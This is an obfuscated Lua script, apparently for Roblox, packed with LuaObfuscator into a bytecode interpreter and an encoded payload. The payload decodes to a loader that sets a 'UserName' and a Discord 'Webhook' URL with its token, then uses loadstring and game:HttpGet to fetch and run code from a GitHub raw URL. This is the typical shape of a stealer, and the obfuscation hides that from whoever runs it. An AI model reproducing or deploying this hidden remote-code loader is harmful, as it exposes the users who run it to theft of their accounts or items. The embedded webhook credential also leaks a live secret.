--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=(619 -(555 + 64)) -0 ;local v32;while true do if (v31==(2 -1)) then return v32;end if (v31==(0 -0)) then v32=v1(v16,v19,v19);v19=v19 + (2 -1) ;v31=1;end end end v23=nil;function v23()local v33,v34=v1(v16,v19,v19 + (933 -(857 + 74)) );v19=v19 + (570 -(367 + 201)) ;return (v34 * 256) + v33 ;end v18=3;end if (v18==4) then function v25()local v35=927 -((1401 -(1069 + 118)) + 713) ;local v36;local v37;local v38;local v39;local v40;local v41;while true do if (v35==(1 + 0)) then v38=1 + (0 -0) ;v39=(v21(v37,878 -(282 + 595) ,20) * (((3584 -1945) -(1523 + 114))^(29 + 3))) + v36 ;v35=(1 + 1) -(0 -0) ;end if ((1065 -(68 + 997))==v35) then v36=v24();v37=v24();v35=1271 -(226 + 1044) ;end if (v35==(8 -6)) then v40=v21(v37,138 -(32 + 85) ,31 + 0 + 0 );v41=((v21(v37,8 + 24 )==((1749 -(368 + 423)) -(892 + 65))) and  -(2 -1)) or (1 -0) ;v35=4 -1 ;end if (v35==(353 -(87 + (826 -563)))) then if (v40==(180 -(67 + 113))) then if (v39==((18 -(10 + 8)) + 0)) then return v41 * (0 -0) ;else local v99=0;while true do if (v99==(0 + 0)) then v40=3 -2 ;v38=952 -(802 + (577 -427)) ;break;end end end elseif (v40==(5511 -3464)) then return ((v39==(0 -0)) and (v41 * (((443 -(416 + 26)) + 0)/(997 -(915 + (261 -179)))))) or (v41 * NaN) ;end return v8(v41,v40-(2896 -1873) ) * (v38 + (v39/((2 + 0)^(68 -16)))) ;end end end v26=nil;function v26(v42)local v43;if  not v42 then v42=v24();if (v42==(0 + 0)) then return "";end end v43=v3(v16,v19,(v19 + v42) -(1 -0) );v19=v19 + v42 ;local v44={};for v67=439 -(145 + 293) , #v43 do v44[v67]=v2(v1(v3(v43,v67,v67)));end return v6(v44);end v18=5;end if (v18==6) then v29=nil;function v29()local v45=0 + 0 ;local v46;local v47;local v48;local v49;local v50;local v51;local v52;while true do if ((1476 -(1329 + 145))==v45) then v50=nil;v51=nil;v45=974 -(140 + 831) ;end if (v45==0) then v46=1850 -(1409 + 441) ;v47=nil;v45=1;end if (v45==1) then v48=nil;v49=nil;v45=2;end if (v45~=(721 -(15 + 703))) then else v52=nil;while true do if (v46~=2) then else local v96=0 + 0 ;while true do if (v96==0) then for v101=1,v51 do local v102=0;local v103;local v104;local v105;while true do if (v102~=(439 -(262 + 176))) then else v105=nil;while true do if (v103==(1721 -(345 + 1376))) then local v155=0;while true do if (v155~=(689 -(198 + 490))) then else v103=4 -3 ;break;end if (v155==0) then local v162=0;while true do if (v162==0) then v104=v22();v105=nil;v162=2 -1 ;end if ((1207 -(696 + 510))==v162) then v155=1;break;end end end end end if (v103==(1 -0)) then if (v104==1) then v105=v22()~=0 ;elseif (v104==(1264 -(1091 + 171))) then v105=v25();elseif (v104==3) then v105=v26();end v52[v101]=v105;break;end end break;end if (v102==(0 + 0)) then v103=0;v104=nil;v102=3 -2 ;end end end v50[3]=v22();v96=3 -2 ;end if ((375 -(123 + 251))==v96) then for v106=4 -3 ,v24() do local v107=698 -(208 + 490) ;local v108;local v109;local v110;while true do if (v107==0) then v108=0 + 0 ;v109=nil;v107=1;end if (v107~=(1 + 0)) then else v110=nil;while true do if (v108==0) then v109=0;v110=nil;v108=1;end if (1~=v108) then else while true do if (v109==0) then v110=v22();if (v21(v110,837 -(660 + 176) ,1 + 0 )==0) then local v165=202 -(14 + 188) ;local v166;local v167;local v168;local v169;while true do if (v165==(675 -(534 + 141))) then v166=0;v167=nil;v165=1 + 0 ;end if (v165==(2 + 0)) then while true do if (v166~=(3 + 0)) then else if (v21(v168,6 -3 ,3)==(1 -0)) then v169[4]=v52[v169[4]];end v47[v106]=v169;break;end if ((2 -1)~=v166) then else local v171=0;while true do if (v171~=(1 + 0)) then else v166=2 + 0 ;break;end if (v171==0) then v169={v23(),v23(),nil,nil};if (v167==0) then local v177=396 -(115 + 281) ;local v178;while true do if (v177==(0 -0)) then v178=0 + 0 ;while true do if (v178==0) then v169[7 -4 ]=v23();v169[14 -10 ]=v23();break;end end break;end end elseif (v167==(868 -(550 + 317))) then v169[3 -0 ]=v24();elseif (v167==2) then v169[3 -0 ]=v24() -((5 -3)^16) ;elseif (v167==(288 -(134 + 151))) then local v188=1665 -(970 + 695) ;local v189;while true do if (v188~=(0 -0)) then else v189=1990 -(582 + 1408) ;while true do if ((0 -0)==v189) then v169[3]=v24() -(2^(19 -3)) ;v169[4]=v23();break;end end break;end end end v171=3 -2 ;end end end if (v166==2) then local v172=0;while true do if (v172~=(1824 -(1195 + 629))) then else if (v21(v168,1 -0 ,242 -(187 + 54) )==1) then v169[782 -(162 + 618) ]=v52[v169[2 + 0 ]];end if (v21(v168,2,2)==(1 + 0)) then v169[6 -3 ]=v52[v169[3]];end v172=1 -0 ;end if (v172==1) then v166=3;break;end end end if (v166~=(0 + 0)) then else local v173=0;local v174;while true do if (v173~=0) then else v174=1636 -(1373 + 263) ;while true do if (v174==1) then v166=1;break;end if (v174~=0) then else local v183=1000 -(451 + 549) ;while true do if (v183==(0 + 0)) then v167=v21(v110,2,4 -1 );v168=v21(v110,4,6);v183=1 -0 ;end if (v183==(1385 -(746 + 638))) then v174=1 + 0 ;break;end end end end break;end end end end break;end if (v165==(1 -0)) then v168=nil;v169=nil;v165=343 -(218 + 123) ;end end end break;end end break;end end break;end end end v46=1584 -(1535 + 46) ;break;end end end if (v46~=3) then else local v97=0;while true do if (v97==0) then for v111=1,v24() do v48[v111-1 ]=v29();end return v50;end end end if (v46==(1 + 0)) then local v98=0 + 0 ;while true do if (0~=v98) then else v50={v47,v48,nil,v49};v51=v24();v98=1 -0 ;end if (v98~=(1468 -(899 + 568))) then else v52={};v46=2 + 0 ;break;end end end if (v46~=0) then else v47={};v48={};v49={};v46=1;end end break;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v53)if (v1(v53,2)==79) then v20=v0(v3(v53,1,1));return "";else local v83=v2(v0(v53,16));if v20 then local v89=v5(v83,v20);v20=nil;return v89;else return v83;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v54,v55,v56,v57=v1(v16,v19,v19 + (7 -4) );v19=v19 + ((73 + 534) -(268 + 335)) ;return (v57 * (16777506 -(60 + 230))) + (v56 * (66108 -(426 + 146))) + (v55 * (1712 -(282 + 1174))) + v54 ;end v25=nil;v18=4;end if (v18==7) then function v30(v58,v59,v60)local v61=v58[1];local v62=v58[2];local v63=v58[3];return function(...)local v69=v61;local v70=v62;local v71=v63;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v84=0,v77 do if (v84>=v71) then v75[v84-v71 ]=v76[v84 + 1 ];else v79[v84]=v76[v84 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v85=0;while true do if (v85==0) then v81=v69[v73];v82=v81[1];v85=1;end if (v85==1) then if (v82<=5) then if (v82<=2) then if (v82<=0) then do return;end elseif (v82>1) then v79[v81[2]]=v60[v81[3]];else local v120=v81[2];local v121=v79[v81[3]];v79[v120 + 1 ]=v121;v79[v120]=v121[v81[4]];end elseif (v82<=3) then v79[v81[2]]=v81[3]~=0 ;elseif (v82>4) then v79[v81[2]]();else v60[v81[3]]=v79[v81[2]];end elseif (v82<=8) then if (v82<=6) then v60[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v60[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v73=v81[3];elseif (v82==7) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end else v79[v81[2]]=v81[3];end elseif (v82<=10) then if (v82==9) then local v129;local v130,v131;local v132;local v133;v60[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v60[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v60[v81[3]];v73=v73 + 1 ;v81=v69[v73];v133=v81[2];v132=v79[v81[3]];v79[v133 + 1 ]=v132;v79[v133]=v132[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3]~=0 ;v73=v73 + 1 ;v81=v69[v73];v133=v81[2];v130,v131=v72(v79[v133](v13(v79,v133 + 1 ,v81[3])));v74=(v131 + v133) -1 ;v129=0;for v151=v133,v74 do v129=v129 + 1 ;v79[v151]=v130[v129];end v73=v73 + 1 ;v81=v69[v73];v133=v81[2];v79[v133]=v79[v133](v13(v79,v133 + 1 ,v74));v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]();v73=v73 + 1 ;v81=v69[v73];v73=v81[3];else local v143=0;local v144;while true do if (v143==0) then v144=v81[2];v79[v144]=v79[v144](v13(v79,v144 + 1 ,v74));break;end end end elseif (v82==11) then v73=v81[3];else local v146=0;local v147;local v148;local v149;local v150;while true do if (v146==1) then v74=(v149 + v147) -1 ;v150=0;v146=2;end if (v146==2) then for v160=v147,v74 do local v161=0;while true do if (v161==0) then v150=v150 + 1 ;v79[v160]=v148[v150];break;end end end break;end if (v146==0) then v147=v81[2];v148,v149=v72(v79[v147](v13(v79,v147 + 1 ,v81[3])));v146=1;end end end v73=v73 + 1 ;break;end end end end;end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v64,v65,v66)if v66 then local v86=811 -(569 + 242) ;local v87;while true do if (v86==(0 -0)) then v87=(v64/((1 + 0 + 1)^(v65-(1025 -(706 + 318)))))%(2^(((v66-1) -(v65-1)) + (1252 -(721 + 530)))) ;return v87-(v87%((2772 -(1408 + 92)) -(945 + 326))) ;end end else local v88=(4 -2)^(v65-1) ;return (((v64%(v88 + v88))>=v88) and (1 + 0)) or (700 -(271 + 429)) ;end end v22=nil;v18=2;end end end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D653203083O003953485749574845030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403403O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4153544F52534352495054532F4153544F52322F6D61696E2F4153544F5203083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3130372O3233373438313532363832393037362F677A4554524B75575F572D634F78377A3564556D6F3268664B4C422D6C74367771385267456B304761757265344A576C496450683343666A766C7442766A68316434684D00173O0012083O00013O0026073O000E0001000200040B3O000E0001001208000100043O001209000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000500016O000200056O00013O00024O00010001000100044O001600010026073O00010001000100040B3O00010001001208000100043O001206000100093O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100016O00017O00",v9(),...);
